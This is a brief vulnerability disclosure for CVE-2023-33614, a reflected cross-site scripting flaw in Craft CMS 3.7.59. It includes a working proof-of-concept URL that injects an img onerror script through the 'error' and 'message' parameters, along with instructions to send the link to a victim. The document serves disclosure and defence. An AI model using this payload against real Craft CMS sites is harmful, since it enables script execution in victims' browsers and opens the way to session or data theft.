[CVE-2023-33614] Reflected - Cross Site Script (XSS)
Exploit Author: Dat Nguyen aka datnlq of VietSunshine Cyber Security Services
Vendor of Product: CraftCMS
Affected Product Code Base: 3.7.59
CVE: CVE-2023-33614
Description: Craft CMS version 3.7.59 is vulnerable of XSS vulnerability, which allows remote unauthenticated attacker to execute javascript code via error and message parameter.
Steps to reproduce:
Send a URL http://localhost/craftcms/web/admin/plugin-store/callback?error=error%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E&message=message%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E to victim, when user clicked the link, XSS will be executed.
Previous[CVE-2023-30179] Server-Side Template InjectionNext[CVE-2023-33616] Server-side request forgery (SSRF)
Last updated